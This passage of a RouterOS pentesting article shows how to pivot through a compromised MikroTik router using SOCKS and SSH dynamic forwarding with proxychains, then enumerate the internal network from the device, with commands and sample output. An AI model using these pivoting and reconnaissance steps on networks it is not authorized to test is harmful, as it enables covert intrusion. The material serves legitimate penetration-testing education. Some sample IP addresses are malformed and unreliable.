[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 09:41 UTC
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.7:80  ...  OK
[proxychains] Strict chain  ...  XXX.XXX.XXX.XX:7777  ...  10.10.100.7:22  ...  OK
Nmap scan report for 10.10.100.7
Host is up (0.14s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
caster@kali:~$

NOTE: I've used nmap in this article to demonstrate in a clear and easy to understand way that this pivoting method works. It is known that nmap does not work well with proxychains. Running nmap in the pivoting scenarios of this article is just a way to visualize that moving into the infrastructure does happen.

Socks Outro

SOCKS pivoting is a powerful tool to move covertly across the network, giving an attacker access to isolated segments through compromised devices. Configuring a proxy server on RouterOS opens the door to further reconnaissance and attacks in the internal infrastructure, making this pivoting method extremely effective.

SSH Dynamic Port Forwarding

SSH Dynamic Port Forwarding can serve as a pivoting technique that allows an attacker to use a compromised device to tunnel traffic through an SSH connection.

In order to enable the DPF feature on RouterOS, you must enable the corresponding setting for the SSH server:

/ip/ssh/set forwarding-enabled=both

According to the official documentation, the forwarding-enabled=both option allows both local and remote SSH forwarding:

  • no - SSH forwarding is disabled;
  • local - local forwarding is allowed, which also controls dynamic forwarding;
  • remote - remote forwarding is allowed;
  • both - both forwarding methods are allowed (we need both)

Once RouterOS is configured, an attacker can connect to a compromised device using SSH Dynamic Port Forwarding, turning the router into a gateway through which they can get into the infrastructure:

caster@kali:~$ ssh -D 1080 -C -N -f caster@victim
  • -D 1080 - enables dynamic forwarding over port 1080;
  • -C - enables data compression;
  • -N - disables command execution on the remote device, limiting the session to tunneling only;
  • -f - starts the session in the background.

SSH DPF Pivoting Map

I drew a little net drawing of what it would look like

SSH DPF Pivoting Map

After successful execution of this command, SSH starts listening on port 1080 on the local machine:

LISTEN    0         128              127.0.0.1:1080            0.0.0.0:*        users:(("ssh",pid=389297,fd=5))

Next, the attacker configures proxychains:

socks5 127.0.0.1 1080
This is /etc/proxychains.conf

Once proxychains are configured, an attacker can use tools such as nmap to scan the internal network through the compromised RouterOS:

caster@kali:~$ proxychains nmap -sT -n -p 22 10.10.100.100
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-26 10:12 UTC
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.100.100:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.100.100:22  ...  OK
Nmap scan report for 10.10.100.100
Host is up (0.033s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

To dilute the examples using nmap, here is an example of trying to connect to a host using SSH:

caster@caster:~$ proxychains ssh [email protected]
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.100.100:22  ...  OK
[email protected]'s password:

  ********************************************
  *        ePMP command line interface       *
  ********************************************

Connected sessions:
User:                         Started [seconds ago]:   Last activity:   IP:
admin (current)               0                        0                10.10.100.254

CambiumBS1>
CambiumBS1>
CambiumBS1>

Outro

SSH Dynamic Port Forwarding provides a convenient way to pirate through compromised devices. Configuring dynamic forwarding on RouterOS allows an attacker to access isolated resources through an SSH tunnel, using proxychains to redirect traffic. This method remains hidden to most network monitoring systems, making it an effective tool for investigating internal infrastructure.

RouterOS Post-Exploitation

In this chapter, I will demonstrate several tactics for post-exploitation of RouterOS.

Scans on Hardware: IP Scan

IP Scan - is a built-in tool in RouterOS that allows you to scan address ranges to locate active devices on your network. It returns data such as IP addresses, MAC addresses, and NetBIOS names, making it useful for both administrators and attackers in the post-exploitation phase.

An attacker can use IP Scan to gather information about connected devices on the network. Here's how it can be applied:

  1. Mapping the network: IP Scan allows an attacker to quickly gain insight into the network topology and understand which devices are active in a range of IP addresses. This is especially useful for launching attacks after gaining initial access to a RouterOS device. By knowing the IP and MAC addresses, an attacker can better plan further actions, such as attacking devices or attempting to pivot through other systems;
  2. Hostnames: NetBIOS names can help an attacker identify devices such as workstations or servers, giving insight into which systems may be of higher value for subsequent attacks. Using data obtained through IP Scan, an attacker can attempt to identify device types (e.g., routers, servers, or IoT devices) by characteristic MAC addresses or NetBIOS names. This makes it easier to prepare targeted attacks against specific devices.

To use IP Scan in RouterOS, an attacker can perform a scan using the following command:

/tool/ip-scan interface=home address-range=192.168.0.0/24
  • interface=home - indicates on which interface the scan will be performed
  • address-range=192.168.0.0.0/24 - indicates that the address range 192.168.0.0/24 will be scanned.

Result:

Columns: ADDRESS, MAC-ADDRESS, TIME, SNMP
ADDRESS MAC-ADDRESS TIME SNMP   
192.168.0.51 B0:DC:EF:29:E2:71 1ms          
192.168.0.56 72:56:2E:32:CB:89 83ms         
192.168.0.254 0ms Survive.

IP Scan remains a powerful tool for an attacker who already has access to RouterOS. As a post-exploitation tool, it allows the attacker to:

  • Detect active devices: By obtaining IP addresses, MAC addresses, and NetBIOS names, an attacker can map the network and understand what devices are functioning on it;
  • Analyze Connected Devices: This information can be used to track device types, their purpose, and the possibility of further attacks, such as on workstations or servers;
  • Gather data for pivoting: Knowing information about network nodes, an attacker can look for opportunities to further propagate through the network by launching attacks against other devices.

ARP Table

The ARP Table (Address Resolution Protocol Table) is a table in RouterOS that maps the correspondence between IP addresses and MAC addresses on a network. In a post-exploitation context, an attacker can use this table to:

  1. Determine active hosts: The ARP table gives up-to-date information about which devices are communicating with the network;
  2. Finding interesting targets: By MAC addresses, devices such as workstations, routers or servers can be identified and selected for further exploitation.

Using ARP Table for attack:

An attacker can use the /ip arp print command in RouterOS to output the current ARP entries:

/ip arp print
Columns: ADDRESS, MAC-ADDRESS, INTERFACE
ADDRESS MAC-ADDRESS INTERFACE  
192.168.0.1 00:0C:29:E8:94:13 ether1     
192.168.0.101 50:46:5D:F0:9B:1C ether1     
192.168.0.102 00:0C:29:76:52:AD ether2     

By knowing the IP and MAC addresses of devices on the network, an attacker can use this information to launch subsequent attacks against specific targets, such as servers or workstations.

DNS Cache

The DNS Cache in RouterOS is a repository of information about domain names and their corresponding IP addresses that have been recently queried by the device. In a post-exploitation context, an attacker can use the DNS Cache to:

  1. Gathering domain information: This allows an attacker to learn which domain names were recently resolved and thus identify services or sites used on the network.
  2. Finding internal services: Requests for internal network resources can be found in the cache, allowing an attacker to learn more about the network infrastructure.

An attacker can view cached records using the command:

/ip dns/cache/print
Columns: NAME, ADDRESS, TTL
NAME ADDRESS TTL     
google.com 142.250.74.110 1h     
internal-service.local 10.0.0.0.50 12h

Using DNS Cache, an attacker can:

  • Learn about internal domains or services that are not visible from the Internet;
  • Conduct targeted attacks against discovered services based on information about resolved domains.

Addressing Enumeration

Addressing Enumeration is the process of extracting information about IP addresses associated with devices on a network. In the post-exploitation context in RouterOS, an attacker can use address enumeration methods to identify active hosts, IP address ranges, network interfaces, and routing schemes.

An attacker can use the following commands to extract information:

  • IP Address Print: to display all assigned IP addresses:
/ip address print

Result:

192.168.0.10.10/24 192.168.0.0 ether1
  • Route Print: to view routes:
/ip route print

Result:

DST-ADDRESS GATEWAY INTERFACE
0.0.0.0.0/0 192.168.0.1 ether1

Usage in the attack:

  1. Identify active interfaces: By identifying active interfaces and IP addresses, an attacker can determine the most vulnerable points in the network for further attacks;
  2. Awareness of network structure: Address enumeration helps to gain information about the network architecture, identify critical network resources, and understand the network topology.

Interfaces

Network interfaces are the RouterOS device's network connections that are responsible for transmitting data in and out of the network. In the post-exploitation context, an attacker can use information about interfaces to further analyze the network topology, examine external and internal connections, and attack specific network segments.

To view information about network interfaces in RouterOS, an attacker can use the command:

/interface print

Result:

Columns: NAME, TYPE, MTU, MAC-ADDRESS
# NAME TYPE MTU MAC-ADDRESS
0 ether1 ether 1500 00:0C:42:3E:4A:1C
1 ether2 ether 1500 00:0C:42:3E:4A:1D
2 bridge1 bridge 1500 00:0C:42:3E:4A:1E

Network interface information can be useful to an attacker for:

  1. Identify internal and external network segments: By knowing which interfaces are associated with internal and external network segments, an attacker can target specific devices. For example, interfaces such as bridge may indicate LAN segments, while ether1 may represent an external interface associated with the Internet.
  2. Network Load Analysis: Using commands to analyze traffic by interface, an attacker can understand which network segments are most active and potentially contain interesting targets for attacks.

Outro

I wrote an extremely specific article about attacks on MikroTik routers. I hope this article will give something new in terms of techniques to pentesters, and security professionals will learn more about RouterOS pentesting and improve the security of their devices.

If you feel pain, open

Если у вас суицидальные мысли или вы страдаете от психических расстройств, немедленно обратитесь к специалисту. Ваша жизнь - в ваших руках, и только вы можете сделать первый шаг к помощи. Не позволяйте другим стигматизировать и обесценивать ваши чувства и переживания. Не позволяйте никому выводить вас из душевного равновесия - в этом мире самое дорогое, что у вас есть, это вы сами. Помощь всегда рядом.
Номера горячих линий поддержки в России:

  • Единая горячая линия психологической помощи: 8-800-333-44-34
  • Экстренная психологическая помощь: 8-800-100-49-94
  • Горячая линия для подростков: 8-800-2000-122

If you are having suicidal thoughts or struggling with mental health disorders, please reach out to a professional immediately. Your life is in your hands, not in the hands of those who stigmatize or devalue your struggles. Do not let anyone take away your inner peace - in this world, the most valuable thing you have is yourself. Help is always within reach.
Hotline numbers in the US and EU:

  • USA: National Suicide Prevention Lifeline: 1-800-273-TALK (8255) or text HELLO to 741741
  • EU: You can find local support services by country through the European Alliance Against Depression EAAD.
  • UK: Samaritans: 116 123

Subscribe to exploit.org

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
[email protected]
Subscribe